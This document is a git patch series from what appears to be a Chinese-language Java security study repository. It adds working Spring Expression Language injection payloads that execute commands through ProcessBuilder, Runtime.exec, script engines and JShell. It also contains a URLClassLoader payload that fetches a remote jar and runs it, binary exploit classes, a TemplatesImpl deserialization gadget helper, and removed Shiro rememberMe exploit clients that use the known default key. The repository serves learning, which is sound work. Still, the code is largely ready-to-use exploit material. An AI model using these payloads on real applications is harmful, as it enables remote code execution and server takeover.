.../SPEL/.idea/misc.xml" | 14 ++++ .../SPEL/.idea/vcs.xml" | 6 ++ .../SPEL/pom.xml" | 30 ++++++++ .../SPEL/src/main/java/Exp.jar" | Bin 0 -> 863 bytes .../SPEL/src/main/java/aaa/bbb/Exp.class" | Bin 0 -> 595 bytes .../main/java/com/spring/WebApplication.java" | 7 ++ .../spring/controller/TestController.java" | 32 ++++++++ .../src/main/java/com/test/BasicUsage.java" | 26 +++++++ .../src/main/java/com/test/BypassTrick.java" | 16 ++++ .../src/main/java/com/test/ClassPathXml.java" | 9 +++ .../SPEL/src/main/java/com/test/RceEcho.java" | 46 ++++++++++++ .../src/main/java/com/test/RcePart1.java" | 69 ++++++++++++++++++ .../src/main/java/com/test/RcePart2.java" | 41 +++++++++++ .../SPEL/src/main/java/com/test/tmp.java" | 11 +++ .../SPEL/src/main/resources/1.xml" | 6 ++ .../SPEL/src/main/resources/application.yml" | 2 + 19 files changed, 368 insertions(+) create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BypassTrick.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/ClassPathXml.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" new file mode 100644 index 0000000..d23f859 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" new file mode 100644 index 0000000..60f55d4 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + SPEL + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.apache.commons + commons-io + 1.3.2 + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" new file mode 100644 index 0000000000000000000000000000000000000000..e7a8d7c2f5db3732fd80915e1631cd09d4d08f69 GIT binary patch literal 863 zcmWIWW@Zs#;Nak3=%4Ew&42_r8CV#6T|*poJ^kGD|D9rBU}gyLX6FE@V1g~(iM@{WVhpE(~ ztSI$}snf13`ZF=xJj>+Oz5by5$Opx0Gf&!npI7~EPGxm{4daHUB(6-JWd<#YeS*BK zyo&=(jv1aaoY>Un*{9i;$yR#y>z#tRiuobuk4!btZwWVFYf!NFSJuY~iu)eU_h`Gf z>h;OFVTY$3Y}}yFaWZ0I!MW|On}y4N^-f@LKJ_WOQQ7?N3a`~$W6sJ)^3r#$rF1&S)*p+_vpA6W+~>9Cnb0? z6SEjOD&&i-uFncPDLU(NqCwB&`k3ErZ&~*# z>+5$K{<(X<`SOANeL2eAhP^NLFFKm>`ox8s&VkaLM_%aZ-fgyZ2%Imt`sk*@)nez> z)5&2GryTOKYIyhzj883zRs~ zwIU}FP+~*?TObpz6)9;Vn*d5k$PNP~Bm_7NWMU+%0B=?{kP>Df+ykV0!43xic+?p% literal 0 HcmV?d00001 diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" new file mode 100644 index 0000000000000000000000000000000000000000..d546b9c78a6caf71336e16de5389aef6fbf24ed0 GIT binary patch literal 595 zcmZWm$xg#C6db2*oVF=T%Ubq51w<~~KwJ<=NNgeqRB>{GRRT1rLJIvO&RhV2fIA-r zJXb6Q63Nz^@ys}r*SCjf0E;MPkVQ`hz3AiUH&8S%pr%2NA&%h;42*D$a*Q$P%YNX; zD-7M%=Bc<8_PGcuwi8EwP+2M+FeF#QW699I=?8MVUUg-(FWhrNa!xF~vn^3;&P~65 z3Sh`MVLkHXy01Ot&R=9*/ + public static void jShell(){ + String cmdStr = "T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass(\"jdk.jshell.JShell\",true).Methods[6].invoke(null,{}).eval(\"T(Runtime).getRuntime().exec('whoami')\").toString()"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + /*缺点:只能读一行*/ + public static void br(){ + String cmdStr = "new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"cmd\", \"/c\", \"whoami\").start().getInputStream(), \"gbk\")).readLine()\n"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*useDelimiter内的参数为分割标志,所以随便填一个,这样回显结果才完整*/ + public static void scanner(){ + String cmdStr = "new java.util.Scanner(new java.lang.ProcessBuilder(\"cmd\", \"/c\", \"dir\", \".\").start().getInputStream(), \"GBK\").useDelimiter(\"asfsfsdfsf\").next()\n"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + } diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" index d1f8e0d..942ade1 100644 --- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" @@ -1,4 +1,73 @@ package com.test; +import org.springframework.expression.Expression; +import org.springframework.expression.ExpressionParser; +import org.springframework.expression.spel.standard.SpelExpressionParser; + +import javax.script.ScriptEngineFactory; +import javax.script.ScriptEngineManager; +import java.util.List; + +// 如果使用非默认ParserContext,所有payload用#{}包裹 public class RcePart1 { + public static void main(String[] args) { +// pb(); +// runtime(); +// getEngineFactory(); +// nashorn(); + javascript(); + } + + public static void pb() { + String cmdStr = "new java.lang.ProcessBuilder(new String[]{'calc'}).start()"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } + + public static void runtime() { + String cmdStr = "T(Runtime).getRuntime().exec(new String[]{'cmd.exe', '/c', 'notepad'})"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + public static void getEngineFactory() { + ScriptEngineManager manager = new ScriptEngineManager(); + List factories = manager.getEngineFactories(); + for (ScriptEngineFactory factory: factories){ + System.out.printf( + "Name: %s%n" + "Version: %s%n" + "Language name: %s%n" + + "Language version: %s%n" + + "Extensions: %s%n" + + "Mime types: %s%n" + + "Names: %s%n", + factory.getEngineName(), + factory.getEngineVersion(), + factory.getLanguageName(), + factory.getLanguageVersion(), + factory.getExtensions(), + factory.getMimeTypes(), + factory.getNames() + ); + } + } + + public static void nashorn(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } + + public static void javascript(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } } diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" index 5f1f32c..dcbe6df 100644 --- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" @@ -1,4 +1,45 @@ package com.test; +import org.springframework.expression.Expression; +import org.springframework.expression.ExpressionParser; +import org.springframework.expression.spel.standard.SpelExpressionParser; + public class RcePart2 { + public static void main(String[] args) { +// urlLoader(); +// appLoader(); + getAppFromOtherClass(); + } + + /*打包jar时,如果类在多层包中,打包时一定要把前面几层文件夹也打包进行,jar打开应该是aaa/bbb/Exp.class的形式,这样才能正常loadClass*/ + public static void urlLoader(){ + String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"http://127.0.0.1:7777/Exp.jar\")}).loadClass(\"aaa.bbb.Exp\").getConstructors()[0].newInstance(\"calc\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + public static void appLoader(){ + String cmdStr = "T(ClassLoader).getSystemClassLoader().loadClass(\"java.lang.Runtime\").getRuntime().exec('calc')"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*我这里利用失败了*/ + public static void getAppFromOtherClass(){ + String cmdStr = "T(org.springframework.expression.Expression).getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")"; + + ExpressionParser parser = new SpelExpressionParser(); + Expression exp = parser.parseExpression(cmdStr); + System.out.println( exp.getValue() ); + } + + /*有web上下文的环境使用。不过我本地测试全失败了。而且不知道为什么文章里要加[[${}]]*/ + public static void getUrlFromInnerClass(){ + String cmdStr1 = "#request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")"; + String cmdStr2 = "username[#this.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('xterm')\")]=asdf"; + } } diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" new file mode 100644 index 0000000..b9c3df7 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" @@ -0,0 +1,11 @@ +package com.test; + +import org.springframework.expression.Expression; + +public class tmp { + public static void main(String[] args) throws ClassNotFoundException { + ClassLoader classLoader = Expression.class.getClassLoader(); + System.out.println(classLoader); + Class aClass = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime"); + } +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" new file mode 100644 index 0000000..4bd7209 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" index e69de29..9899989 100644 --- "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" @@ -0,0 +1,2 @@ +server: + port: 8083 \ No newline at end of file From 295f4e437bb0a8fd30e3f5dfeacf77a5b2bc0fe0 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Thu, 23 Oct 2025 17:54:37 +0800 Subject: [PATCH 11/16] =?UTF-8?q?doc:=E6=9B=B4=E6=96=B0shiro?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 46 +++++++-- shiro/shiroDeser/CalcAbs.class | Bin 0 -> 1501 bytes shiro/shiroDeser/python/enc_dec.py | 0 .../shiroDeser/src/main/java/com/exp/CB.java | 4 + .../src/main/java/com/exp/KeyDetect.java | 4 + .../src/main/java/com/exp/TemplatesGen.java | 54 ++++++++++ .../main/java/com/test/WebApplication.java | 4 + .../java/com/test/config/ShiroConfig.java | 4 + .../main/java/com/test/config/UserRealm.java | 4 + .../com/test/controller/LoginController.java | 4 + .../src/main/resources/application.yml | 0 .../src/main/resources/templates/home.html | 10 ++ .../src/main/resources/templates/login.html | 14 +++ shiro/shiroattack/pom.xml | 96 ------------------ shiro/shiroattack/shiroattack.iml | 2 - .../java/com/govuln/shiroattack/Client.java | 20 ---- .../java/com/govuln/shiroattack/Client0.java | 15 --- .../java/com/govuln/shiroattack/Client1.java | 20 ---- .../shiroattack/CommonsBeanutils1Shiro.java | 43 -------- .../shiroattack/CommonsCollections6.java | 55 ---------- .../shiroattack/CommonsCollectionsShiro.java | 51 ---------- .../java/com/govuln/shiroattack/Evil.java | 19 ---- .../main/resources/templates/payload.html" | 10 ++ 23 files changed, 148 insertions(+), 331 deletions(-) create mode 100644 shiro/shiroDeser/CalcAbs.class create mode 100644 shiro/shiroDeser/python/enc_dec.py create mode 100644 shiro/shiroDeser/src/main/java/com/exp/CB.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/WebApplication.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java create mode 100644 shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java create mode 100644 shiro/shiroDeser/src/main/resources/application.yml create mode 100644 shiro/shiroDeser/src/main/resources/templates/home.html create mode 100644 shiro/shiroDeser/src/main/resources/templates/login.html delete mode 100644 shiro/shiroattack/pom.xml delete mode 100644 shiro/shiroattack/shiroattack.iml delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java delete mode 100644 shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" diff --git a/README.md b/README.md index d036f36..850e8da 100644 --- a/README.md +++ b/README.md @@ -87,6 +87,14 @@ +
+ +# JavaWeb基础 + +待完善。。。 + + +
# 代码 / jar包调试 @@ -283,11 +291,17 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 ====================shiro反序列化快速入门的话,可以只看上面的====================== +[全版本Shiro反序列化漏洞原理详解 - Smile3306 - 博客园](https://www.cnblogs.com/Smile3306/p/18984943) 详细梳理了加密和利用原理 + +[CBC字节翻转攻击&Padding Oracle Attack原理解析 - 枫のBlog](https://goodapple.top/archives/217) 721构造合法密文的具体原理 + [Shiro RememberMe 漏洞检测的探索之路 - CT Stack 安全社区](https://stack.chaitin.com/techblog/detail/39) 通过密钥正常错误时,回显中rememberMe字段的不同来实现密钥爆破 -[一种另类的 shiro 检测方式](https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ) +[奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) -[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面还提到pen4uin师傅的文章,也可以去看看 +[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 + +[终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g)
@@ -407,8 +421,6 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-## - # 表达式+SSTI ## SPEL @@ -489,14 +501,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# JavaWeb基础 - -待完善。。。 - -
- # 代码审计 [Java安全慢游记](https://www.yuque.com/pmiaowu/gpy1q8) 非常好整理,强烈推荐,有基础也有例子,还讲了Tabby和CodeQL在审计中的运用 @@ -625,6 +631,26 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+# 博客&公众号整理 + +整理一些我经常看的博客和公众号,仅根据个人主观收录,可能有很多其他优秀的没收录 + +## 博客 + +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) + +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) + + + + + +## 公众号 + +漫漫安全路 + + + # 工具推荐 [vulhub/java-chains: Vulhub Vulnerability Reproduction Designated Platform](https://github.com/vulhub/java-chains) 利用链神器 diff --git a/shiro/shiroDeser/CalcAbs.class b/shiro/shiroDeser/CalcAbs.class new file mode 100644 index 0000000000000000000000000000000000000000..d22b012393dec8d0ee894fbc0feb33f2d3aa2aa9 GIT binary patch literal 1501 zcmbtUT~8B16g|@xwp}Vn3;3;|A_ax<10PI{Qb8k05hDa+cpA228M7Z`c4``bkng^T z(ZnC%k22obF0_d?#gNVH?7esHxo6JanP0!Z{{*m%Wfu-+UEIQ49u+&!J6Lcrgjol- z8HOLLP?;wT*~V+VIAX0!<7_mK`5K3D2q6!5qe@<=ziI1t{xwC((=_>((JE{v|12kTlggF*gc+D|utd$d6}7Y{Untwr#k6Uc zEL;(J6ddp(?&2O5qh9xlxQ_?)JJNLwD<|z<-3pBgB&Q=m?eCdwdj@<-?Nm;8jM<)e70_w@_ASP<`c*naMz3Gsl-8ZE8sjL@+v2V#UVwF>hLg0h1Y&_wD40UnuQDc*IKw2SsJQi=!+9!i zVK0!!!ak*83H=3IN?@lu!M?B;afv{V*j^?DuHb44Tcg>QEd0RGyF(1uyR6+LFhP<{ gCM7!D3b=-8O2`wt8IpmnVzR6Z*J<3K?+kAK0g_;WSO5S3 literal 0 HcmV?d00001 diff --git a/shiro/shiroDeser/python/enc_dec.py b/shiro/shiroDeser/python/enc_dec.py new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/java/com/exp/CB.java b/shiro/shiroDeser/src/main/java/com/exp/CB.java new file mode 100644 index 0000000..a7a6436 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/CB.java @@ -0,0 +1,4 @@ +package com.exp; + +public class CB { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java new file mode 100644 index 0000000..df209a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java @@ -0,0 +1,4 @@ +package com.exp; + +public class KeyDetect { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java new file mode 100644 index 0000000..81daacd --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java @@ -0,0 +1,54 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; + +import javax.xml.transform.Templates; +import java.io.*; +import java.lang.reflect.Field; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(String bytePath) throws IOException, IllegalAccessException { + byte[] bytes = Files.readAllBytes(Paths.get(bytePath)); + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_name", "1diot9"); + setFieldValue(templates, "_class", null); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + setFieldValue(templates, "_bytecodes", new byte[][]{bytes}); + + return templates; + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + try { + field = aClass.getDeclaredField(fieldName); + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + field.setAccessible(true); + field.set(obj, value); + } + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes) throws IOException, ClassNotFoundException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } +} diff --git a/shiro/shiroDeser/src/main/java/com/test/WebApplication.java b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java new file mode 100644 index 0000000..8188334 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class ShiroConfig { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java new file mode 100644 index 0000000..6389c4f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class UserRealm { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java new file mode 100644 index 0000000..2a8f913 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class LoginController { +} diff --git a/shiro/shiroDeser/src/main/resources/application.yml b/shiro/shiroDeser/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/resources/templates/home.html b/shiro/shiroDeser/src/main/resources/templates/home.html new file mode 100644 index 0000000..d6ef988 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/home.html @@ -0,0 +1,10 @@ + + + + Home + + +

Welcome, You are logged in!

+Logout + + diff --git a/shiro/shiroDeser/src/main/resources/templates/login.html b/shiro/shiroDeser/src/main/resources/templates/login.html new file mode 100644 index 0000000..ac0fd72 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/login.html @@ -0,0 +1,14 @@ + + + + Login + + +
+
+
+ +
+

Invalid credentials

+ + diff --git a/shiro/shiroattack/pom.xml b/shiro/shiroattack/pom.xml deleted file mode 100644 index cbf7952..0000000 --- a/shiro/shiroattack/pom.xml +++ /dev/null @@ -1,96 +0,0 @@ - - - - 4.0.0 - - com.govuln - shiroattack - 1.0-SNAPSHOT - - shiroattack - - http://www.example.com - - - UTF-8 - 1.8 - 1.8 - - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.javassist - javassist - 3.27.0-GA - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - diff --git a/shiro/shiroattack/shiroattack.iml b/shiro/shiroattack/shiroattack.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/shiro/shiroattack/shiroattack.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java deleted file mode 100644 index 12d86a5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java deleted file mode 100644 index 177dec5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java +++ /dev/null @@ -1,15 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client0 { - public static void main(String []args) throws Exception { - byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java deleted file mode 100644 index 4f59ed8..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java +++ /dev/null 